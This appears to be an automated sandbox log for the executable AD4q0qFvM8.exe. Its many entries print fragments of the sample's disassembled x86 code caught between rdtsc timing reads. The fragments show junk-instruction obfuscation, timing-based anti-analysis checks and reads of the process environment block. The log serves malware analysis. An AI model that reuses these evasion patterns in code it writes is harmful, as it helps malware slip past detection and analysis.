Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90DE5 second address: F90E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDAC110B286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDAC110B292h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9475D second address: F94766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F94766 second address: F9477C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9477C second address: F94780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F94780 second address: F94796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B292h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F94796 second address: F9479C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: FE12B8 second address: FE12BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: FE40B0 second address: FE40D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDAC0B0C805h 0x00000008 jng 00007FDAC0B0C7F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AB48C second address: 10AB4AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FDAC110B296h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AB4AB second address: 10AB509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FDAC0B0C808h 0x00000015 push ecx 0x00000016 jmp 00007FDAC0B0C804h 0x0000001b jmp 00007FDAC0B0C7FDh 0x00000020 pop ecx 0x00000021 jng 00007FDAC0B0C807h 0x00000027 jmp 00007FDAC0B0C7FBh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AB905 second address: 10AB919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC110B28Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10ABDD6 second address: 10ABDEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FDAC0B0C7FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10ABDEA second address: 10ABDF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FDAC110B286h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10ABDF7 second address: 10ABE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FDAC0B0C805h 0x0000000d ja 00007FDAC0B0C7F6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FDAC0B0C804h 0x0000001e push ecx 0x0000001f jmp 00007FDAC0B0C804h 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AC3DA second address: 10AC3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AC3E0 second address: 10AC3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AF0D6 second address: 10AF0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AF264 second address: 10AF276 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FDAC0B0C7F8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AF276 second address: 10AF27C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10AF310 second address: 10AF32C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C808h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10B0877 second address: 10B08B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FDAC110B288h 0x00000011 push esi 0x00000012 jl 00007FDAC110B286h 0x00000018 jmp 00007FDAC110B291h 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10B08B2 second address: 10B08DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDAC0B0C805h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FDAC0B0C7FDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 10B227A second address: 10B22A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDAC110B28Fh 0x0000000b popad 0x0000000c jmp 00007FDAC110B294h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0032 second address: 70B0038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0038 second address: 70B003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B003C second address: 70B0040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0040 second address: 70B0071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDAC110B28Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDAC110B297h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0071 second address: 70B00E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FDAC0B0C7FEh 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDAC0B0C7FEh 0x0000001d or ecx, 2D907A18h 0x00000023 jmp 00007FDAC0B0C7FBh 0x00000028 popfd 0x00000029 push ecx 0x0000002a pushad 0x0000002b popad 0x0000002c pop edx 0x0000002d popad 0x0000002e sub esp, 18h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FDAC0B0C807h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B00E7 second address: 70B014D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b pushad 0x0000000c mov ah, 52h 0x0000000e mov edx, 18D9FED8h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FDAC110B28Dh 0x0000001e sub ah, FFFFFFC6h 0x00000021 jmp 00007FDAC110B291h 0x00000026 popfd 0x00000027 mov dx, ax 0x0000002a popad 0x0000002b mov ebx, dword ptr [eax+10h] 0x0000002e jmp 00007FDAC110B28Ah 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FDAC110B297h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B014D second address: 70B016A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1CBAh 0x00000007 call 00007FDAC0B0C7FBh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B016A second address: 70B016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B016E second address: 70B0174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0174 second address: 70B0235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDAC110B290h 0x0000000f mov esi, dword ptr [74E806ECh] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDAC110B28Eh 0x0000001c xor ax, 7788h 0x00000021 jmp 00007FDAC110B28Bh 0x00000026 popfd 0x00000027 call 00007FDAC110B298h 0x0000002c pushad 0x0000002d popad 0x0000002e pop eax 0x0000002f popad 0x00000030 test esi, esi 0x00000032 jmp 00007FDAC110B297h 0x00000037 jne 00007FDAC110C0B8h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov dx, 5006h 0x00000044 pushfd 0x00000045 jmp 00007FDAC110B297h 0x0000004a adc ecx, 0D3AF68Eh 0x00000050 jmp 00007FDAC110B299h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0235 second address: 70B02D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 12005FA2h 0x00000008 call 00007FDAC0B0C803h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esp 0x00000012 jmp 00007FDAC0B0C804h 0x00000017 mov dword ptr [esp], edi 0x0000001a pushad 0x0000001b pushad 0x0000001c mov bx, 39FEh 0x00000020 popad 0x00000021 push edi 0x00000022 pushfd 0x00000023 jmp 00007FDAC0B0C802h 0x00000028 or ecx, 0BA515C8h 0x0000002e jmp 00007FDAC0B0C7FBh 0x00000033 popfd 0x00000034 pop ecx 0x00000035 popad 0x00000036 call dword ptr [74E50B60h] 0x0000003c mov eax, 750BE5E0h 0x00000041 ret 0x00000042 jmp 00007FDAC0B0C7FFh 0x00000047 push 00000044h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jmp 00007FDAC0B0C7FBh 0x00000051 jmp 00007FDAC0B0C808h 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B02D9 second address: 70B0335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov edi, ecx 0x0000000d pushfd 0x0000000e jmp 00007FDAC110B290h 0x00000013 and ch, FFFFFFE8h 0x00000016 jmp 00007FDAC110B28Bh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e jmp 00007FDAC110B296h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FDAC110B28Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0335 second address: 70B0392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FDAC0B0C806h 0x0000000f push dword ptr [eax] 0x00000011 pushad 0x00000012 jmp 00007FDAC0B0C7FEh 0x00000017 movzx esi, dx 0x0000001a popad 0x0000001b mov eax, dword ptr fs:[00000030h] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FDAC0B0C809h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B03DE second address: 70B03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B03E3 second address: 70B045B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007FDAC0B0C800h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FDAC0B0C7FDh 0x0000001b sub esi, 1A29C9F6h 0x00000021 jmp 00007FDAC0B0C801h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FDAC0B0C800h 0x0000002d adc ax, 3318h 0x00000032 jmp 00007FDAC0B0C7FBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B045B second address: 70B049C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDB2EE5A4B6h 0x0000000f jmp 00007FDAC110B28Eh 0x00000014 sub eax, eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAC110B28Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B049C second address: 70B04AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C7FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B04AE second address: 70B04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B04B2 second address: 70B04C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B04C2 second address: 70B04DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B04DA second address: 70B04F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dh, cl 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B04F1 second address: 70B054B instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FDAC110B293h 0x0000000c or ecx, 74E1655Eh 0x00000012 jmp 00007FDAC110B299h 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esi+08h], eax 0x0000001c pushad 0x0000001d mov bh, al 0x0000001f mov dx, AA6Ch 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FDAC110B28Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B054B second address: 70B054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B054F second address: 70B0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0555 second address: 70B0571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop ecx 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0571 second address: 70B0584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov bl, 17h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+10h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0584 second address: 70B0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0588 second address: 70B0599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0599 second address: 70B05C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAC0B0C7FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B05C0 second address: 70B0662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007FDAC110B293h 0x0000000b sbb ch, FFFFFFEEh 0x0000000e jmp 00007FDAC110B299h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+14h], eax 0x0000001a jmp 00007FDAC110B28Eh 0x0000001f mov eax, dword ptr [ebx+54h] 0x00000022 jmp 00007FDAC110B290h 0x00000027 mov dword ptr [esi+18h], eax 0x0000002a jmp 00007FDAC110B290h 0x0000002f mov eax, dword ptr [ebx+58h] 0x00000032 pushad 0x00000033 mov ecx, 47C02599h 0x00000038 popad 0x00000039 mov dword ptr [esi+1Ch], eax 0x0000003c jmp 00007FDAC110B294h 0x00000041 mov eax, dword ptr [ebx+5Ch] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FDAC110B28Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0662 second address: 70B0666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0666 second address: 70B066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B066C second address: 70B0672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0672 second address: 70B0676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0676 second address: 70B06B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C808h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDAC0B0C807h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B06B0 second address: 70B06F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 16h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d jmp 00007FDAC110B28Ch 0x00000012 mov dword ptr [esi+24h], eax 0x00000015 jmp 00007FDAC110B290h 0x0000001a mov eax, dword ptr [ebx+64h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FDAC110B297h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B06F8 second address: 70B074D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDAC0B0C7FFh 0x00000009 xor ch, FFFFFFEEh 0x0000000c jmp 00007FDAC0B0C809h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+28h], eax 0x0000001a pushad 0x0000001b jmp 00007FDAC0B0C7FAh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDAC0B0C800h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B074D second address: 70B0751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0751 second address: 70B07E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+68h] 0x0000000a pushad 0x0000000b mov esi, 597E57F3h 0x00000010 mov bx, ax 0x00000013 popad 0x00000014 mov dword ptr [esi+2Ch], eax 0x00000017 jmp 00007FDAC0B0C802h 0x0000001c mov ax, word ptr [ebx+6Ch] 0x00000020 pushad 0x00000021 mov ecx, 64322E0Dh 0x00000026 push eax 0x00000027 pushfd 0x00000028 jmp 00007FDAC0B0C809h 0x0000002d add ax, 2996h 0x00000032 jmp 00007FDAC0B0C801h 0x00000037 popfd 0x00000038 pop ecx 0x00000039 popad 0x0000003a mov word ptr [esi+30h], ax 0x0000003e pushad 0x0000003f call 00007FDAC0B0C7FDh 0x00000044 mov di, si 0x00000047 pop ecx 0x00000048 mov ebx, 3A607FD0h 0x0000004d popad 0x0000004e mov ax, word ptr [ebx+00000088h] 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B07E0 second address: 70B0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDAC110B28Eh 0x0000000a or ax, EC18h 0x0000000f jmp 00007FDAC110B28Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0805 second address: 70B08A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 call 00007FDAC0B0C800h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov word ptr [esi+32h], ax 0x00000013 pushad 0x00000014 push ebx 0x00000015 pushfd 0x00000016 jmp 00007FDAC0B0C7FAh 0x0000001b sbb ch, FFFFFFA8h 0x0000001e jmp 00007FDAC0B0C7FBh 0x00000023 popfd 0x00000024 pop eax 0x00000025 pushfd 0x00000026 jmp 00007FDAC0B0C809h 0x0000002b or ecx, 4233A9C6h 0x00000031 jmp 00007FDAC0B0C801h 0x00000036 popfd 0x00000037 popad 0x00000038 mov eax, dword ptr [ebx+0000008Ch] 0x0000003e jmp 00007FDAC0B0C7FEh 0x00000043 mov dword ptr [esi+34h], eax 0x00000046 jmp 00007FDAC0B0C800h 0x0000004b mov eax, dword ptr [ebx+18h] 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov dx, 9FB0h 0x00000055 mov ecx, edi 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B08A7 second address: 70B08AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B08AD second address: 70B08B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B08B1 second address: 70B08CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop ecx 0x00000013 mov dh, 23h 0x00000015 popad 0x00000016 rdtsc
